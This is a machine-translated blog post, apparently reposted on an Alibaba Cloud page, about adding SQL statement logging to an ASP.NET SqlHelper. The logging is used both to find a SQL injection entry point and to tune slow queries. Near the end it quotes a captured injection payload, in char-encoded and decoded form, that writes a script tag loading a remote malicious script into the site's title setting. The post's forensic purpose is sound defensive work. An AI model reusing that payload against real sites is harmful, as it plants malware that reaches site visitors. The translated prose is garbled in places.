Remember a successful SQL injection intrusion detection comes with SQL performance optimization _mssql

Source: Internet
Author: User
Tags datetime httpcontext sql injection
But if it is to let you take on a second-level crippled website, and let you revision on the above, and can not overturn the revision, can only gradually replace the old program, then you will be very painful, such as I encountered the problem:
Question 1.
The boss said to you, just finished the site before the good, there is no trojan, how you come, there will be a trojan, don't say, hurriedly solve the problem, I completely silent, but if the quarrel, in fact, prove you and the boss as ignorant, come up with evidence and factual analysis to let the company a little understand the technology together to prove that The company's website was hung up on the horse is not your fault.
If I carefully check through the site directory will be uploaded through the FCK network horse to remove and repair FCK upload vulnerability and write down this fckeditor use notes, in fact, many people have encountered, but also resolved, are small problems, but let your boss understand than to solve the problem more eggs pain, I explain to call a Khan Ah, Want to the company all a little bit of technology are called to let them see what is a pony, and then demo how to upload Trojan, Grandma's, Hacker tutorial popularization ah.
Question 2.
The site is having problems again, the last problem solved but two months, the site was also the invasion of the horse, as the boss said this again because I came to the problem, immediately left, this is why not more people do not understand the technology of the head-on, but not with your boss to say you do not understand.
But what's killing me is that the site is a former technology developed by a second-level cripple, in another CMS modified, I have to ensure that the development of the site at the same time the old module can also be used, through the gradual updating of the site at the bottom of the renovation, but so many pages, you can hardly one to detect the page has a loophole, If you write the following test code, it's not easy to get it done, and you can optimize your SQL in this way.
The first step is to create a SQL log table
Copy Code code as follows:

CREATE TABLE [dbo]. [My_sqllog] (
[ID] [bigint] IDENTITY (1,1) not NULL,
[Hit] [bigint] Null
[SQLText] [varchar] (max) COLLATE Chinese_prc_ci_as NULL,
[Paramdetails] [varchar] (max) COLLATE Chinese_prc_ci_as NULL,
[BeginTime] [DateTime] Null
[Endtime] [DateTime] Null
[Fromurl] [varchar] (max) COLLATE Chinese_prc_ci_as NULL,
[IP] [varchar] (m) COLLATE chinese_prc_ci_as NULL,
[Lastelapsedtime] [bigint] Null
CONSTRAINT [Pk_my_sqllog] PRIMARY KEY CLUSTERED
(
[ID] ASC
) with (Ignore_dup_key = out) on [PRIMARY]
) on [PRIMARY]

Log the SQL statement, the number of times this SQL statement was executed, the parameters and values, the start time, end time, from which page, IP, and the execution time of the statement (temporarily useless)
The second step is to write the record code in the SqlHelper.
Two methods could have been written in private, but the other SqlHelper classes used elsewhere in the second-class crippled Web site are called directly here by means of a reasonably optimized SqlHelper class.
Code 1: Inserting a log
Copy Code code as follows:

public static int Executesqllog (CommandType commandtype, string commandtext, params dbparameter[] cmdparams)
{
#region parameter Processing
string colums = "";
String dbtypes = "";
String values = "";
String paramdetails = "";
if (cmdparams!= null && cmdparams.length > 0)
{
foreach (DbParameter param in cmdparams)
{
if (param = null)
{
Continue
}
Colums + = param. ParameterName + "";
Dbtypes + = param. DbType + "";
Values + = param. Value + ";";
}
Paramdetails = string. Format ("{0},{1},{2}", Colums, Dbtypes, values);
}
String fromurl = "";
if (system.web.httpcontext.current!=null)
{
Fromurl = System.Web.HttpContext.Current.Request.Url.ToString ();
}
CommandText = Commandtext.replace ("'", "'"). Replace (";", ";");
sqlparameter[] Parameters = new sqlparameter[]
{
New SqlParameter ("@hit", 1),
New SqlParameter ("@sqltext", CommandText),
New SqlParameter ("@paramdetails", Paramdetails),
New SqlParameter ("@begintime", DateTime.Now),
New SqlParameter ("@endtime", DateTime.Now),
New SqlParameter ("@fromurl", Fromurl),
New SqlParameter ("@ip", Web.PressRequest.GetIP ()),
New SqlParameter ("@lastelapsedtime", 0),
};
#endregion
using (dbconnection connection = Factory.createconnection ())
{
Connection. ConnectionString = Getrealconnectionstring (commandtext);//connectionstring;
String sql = "";
Executes the DbCommand command and returns the result.
int id =
Utils.TypeConverter.ObjectToInt (Executescalarlog (CommandType.Text,
"Select top 1 IDs from My_sqllog where sqltext= @sqltext",
New SqlParameter ("@sqltext", CommandText));
if (ID > 0)
{
sql = "Update my_sqllog set hit=hit+1,ip= @ip, Endtime= @endtime, fromurl= @fromurl where id=" + ID;
}
Else
{
sql = "INSERT into My_sqllog (hit,sqltext,paramdetails,begintime,endtime,fromurl,ip,lastelapsedtime) VALUES (@hit, @ SQLText, @paramdetails, @begintime, @endtime, @fromurl, @ip, @lastelapsedtime) ";
}
Create the DbCommand command and Preprocess
DbCommand cmd = Factory.createcommand ();
BOOL mustcloseconnection = false;
PrepareCommand (cmd, Connection, (dbtransaction) NULL, CommandType, SQL, parameters, out mustcloseconnection);
Executes the DbCommand command and returns the result.
int retval = cmd. ExecuteNonQuery ();
Clears the parameters so that they can be used again.
Cmd. Parameters.clear ();
if (mustcloseconnection)
Connection. Close ();
return retval;
}
}

Code 2: Determine if this SQL exists
Copy Code code as follows:

Private static Object Executescalarlog (CommandType commandtype, string commandtext, params dbparameter[] Commandparameters)
{
if (ConnectionString = null | | Connectionstring.length = = 0) throw new ArgumentNullException ("ConnectionString");
Create and open the database connection object, and the operation completes releasing the object.
using (dbconnection connection = Factory.createconnection ())
{
if (connection = = null) throw new ArgumentNullException ("Connection");
Connection. Close ();
Connection. ConnectionString = Getrealconnectionstring (commandtext);
Connection. Open ();
Create the DbCommand command and Preprocess
DbCommand cmd = Factory.createcommand ();
BOOL mustcloseconnection = false;
PrepareCommand (cmd, Connection, (dbtransaction) null, CommandType, CommandText, Commandparameters, out Mustcloseconnection);
Executes the DbCommand command and returns the result.
Object retval = cmd. ExecuteScalar ();
Clears the parameters so that they can be used again.
Cmd. Parameters.clear ();
if (mustcloseconnection)
Connection. Close ();
return retval;
}
}

The third is to add the following code to each of your methods of executing the SQL statement, whether it be ExecuteScalar, ExecuteReader, ExecuteNonQuery, etc.
Copy Code code as follows:

Logging manipulation prior to executing SQL
int log = Executesqllog (CommandType.Text, CommandText, commandparameters);

code example:
Copy Code code as follows:

public static object ExecuteScalar (DbConnection connection, CommandType CommandType, string commandtext, params Dbparameter[] commandparameters)
{
if (connection = = null) throw new ArgumentNullException ("Connection");
Connection. Close ();
Connection. ConnectionString = Getrealconnectionstring (commandtext);
Connection. Open ();
Create the DbCommand command and Preprocess
DbCommand cmd = Factory.createcommand ();
BOOL mustcloseconnection = false;
PrepareCommand (cmd, Connection, (dbtransaction) null, CommandType, CommandText, Commandparameters, out Mustcloseconnection);
Logging manipulation prior to executing SQL
int log = Executesqllog (CommandType.Text, CommandText, commandparameters);
Executes the DbCommand command and returns the result.
Object retval = cmd. ExecuteScalar ();
Clears the parameters so that they can be used again.
Cmd. Parameters.clear ();
if (mustcloseconnection)
Connection. Close ();
return retval;
}

And then you'll find that the entrance to the invasion is recorded, and in the back of the box is the SQL that constructs the injection

Construct SQL as follows:

39191+update+my_websetting+set+websitetitle=replace (Websitetitle+as+varchar (8000)), cast (char) +char (47) +char (116) +char (a) +char (116) +char (108) +char (a) +char (a) +char (a) +char (m) +char (a) +char (114) +char (105) + char (112) +char (116) +char (a) +char (()) +char (114) +char () +char (+char) +char (116) +char (112) + char (+char) +char (a) +char +char (102) +char (114) +char () +char (a) +char () +char (a) +char ( +char (109) +char () +char (117) +char (114) +char (a) +char (112) +char () +char (112) +char (+) +char (47) + char (+char) +char (114) +char (a) +char (112) +char (116) +char (+) +as+varchar (8000)), cast (char) +as+varchar (8))) --
After turning the code into this:

Update my_websetting set Websitetitle=replace (CAST (websitetitle as varchar (8000)), Websitetitle+ ' </title>< Script src=http://jb51.net/ur.php></script> ')
This is the Trojan address, nothing you do not point, curiosity killed the cat.

Summary:
Now that you know the entrance, you know how to fix it, filter out the string type, and the int type is the int type, and don't let the database do the implicit conversion for you. With this SQL log record, you should find that the hit is still worth a bit.
By hit desc via select top * from My_sqllog
You will find that you write so many SQL original real garbage, if the conditions allow, why not put it in the cache. So later I wrote the SQL basically not in this top 100.
A good point, look at the expert criticism, the above intrusion method hope just learn to do programmer's classmate not to bully small website, can't afford to hurt.
Author: Jqbird

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.